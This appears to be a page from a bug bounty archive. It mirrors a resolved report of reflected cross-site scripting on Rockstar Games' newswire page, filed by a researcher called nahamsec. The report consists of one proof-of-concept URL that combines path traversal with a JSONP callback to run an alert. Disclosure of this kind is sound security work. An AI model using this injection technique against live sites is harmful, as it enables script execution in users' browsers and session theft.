Loading HuntDB...

Reflected XSS via #tags= while using a callback in newswire http://www.rockstargames.com/newswire

Medium
R
Rockstar Games
Submitted None
Reported by nahamsec

Vulnerability Details

Technical details and impact analysis

Cross-site Scripting (XSS) - Generic
Hello, Here's the link: http://www.rockstargames.com/newswire/tags#/?tags=../../comments_dal/users/getGlobalLoginSettings.json?callback=alert%28document.domain%29// Thanks, Ben

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Cross-site Scripting (XSS) - Generic